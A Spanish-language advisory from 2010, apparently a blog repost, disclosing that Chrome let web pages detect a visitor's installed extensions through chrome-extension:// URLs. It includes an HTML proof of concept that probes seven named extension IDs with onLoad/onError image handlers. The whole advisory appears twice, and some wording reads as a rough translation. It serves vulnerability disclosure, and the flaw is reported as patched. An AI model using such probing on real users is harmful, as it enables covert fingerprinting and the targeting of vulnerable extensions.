Google Chrome Instaled extensions arbitrary detection
15 septiembre 2010
######################################################
Google Chrome Instaled extensions arbitrary detection
URL afectada: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Notificación al afectado: Sí Confirmación del afectado: Sí Exploit: Sí
######################################################
Cambio de registro: http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html
#########
Resumen
#########
¿Cuánta seguridad tiene usar extensiones?
Un atacante puede acceder a través de un iframe a las extensiones de recursos (cabe destacar que en este momento no han encontrado una forma de información alterada de las prórrogas).
>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<
(por ejemplo)
un usuario remoto puede modificar este documento web y llamándolo conel tag meta "base" en un formato incorrecto del doc...
<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">
Por lo que llego a la conclusión de que las extensiones chrome necesitan mejorarse y evitar el acceso no interno de recursos de las páginas web externas .. (optativas de usar file:/// y otros controladores de otros protocolos son también seguros de usar y no dan acceso a los recursos internos contra las señales externas de documentos web ...)
Así el controlador de chrome-extension puede ser utilizado para obtener extensiones instaladas en el navegador del cliente ... y con posiblidad de ver ellos si cualquier extensión es vulnerable a algo, puesto que esta información puede ser utilizada para explotar esta extensión ...
En las extensiones en modo incógnito puede ser fácil de detectar.
###########################
Ejemplo de PoC
###########################
<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>
####################EOF##########################
##############
Descubierto
##############
Descubierto:27 may 2010
Notificado:01 jun 2010
Parcheado:02 sep 2010
Publicado: 07 sep 2010
#######################€ND ########################
Thnx To cLimbo for his patience and support.
Atentamente:
Lostmon (lostmon@gmail.com)
-----
thz Lost ;-)
Google Chrome Instaled extensions arbitrary detection
URL afectada: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Notificación al afectado: Sí Confirmación del afectado: Sí Exploit: Sí
######################################################
Cambio de registro: http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html
#########
Resumen
#########
¿Cuánta seguridad tiene usar extensiones?
Un atacante puede acceder a través de un iframe a las extensiones de recursos (cabe destacar que en este momento no han encontrado una forma de información alterada de las prórrogas).
>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<
(por ejemplo)
un usuario remoto puede modificar este documento web y llamándolo conel tag meta "base" en un formato incorrecto del doc...
<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">
Por lo que llego a la conclusión de que las extensiones chrome necesitan mejorarse y evitar el acceso no interno de recursos de las páginas web externas .. (optativas de usar file:/// y otros controladores de otros protocolos son también seguros de usar y no dan acceso a los recursos internos contra las señales externas de documentos web ...)
Así el controlador de chrome-extension puede ser utilizado para obtener extensiones instaladas en el navegador del cliente ... y con posiblidad de ver ellos si cualquier extensión es vulnerable a algo, puesto que esta información puede ser utilizada para explotar esta extensión ...
En las extensiones en modo incógnito puede ser fácil de detectar.
###########################
Ejemplo de PoC
###########################
<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>
####################EOF##########################
##############
Descubierto
##############
Descubierto:27 may 2010
Notificado:01 jun 2010
Parcheado:02 sep 2010
Publicado: 07 sep 2010
#######################€ND ########################
Thnx To cLimbo for his patience and support.
Atentamente:
Lostmon (lostmon@gmail.com)
-----
thz Lost ;-)
Publicar un comentario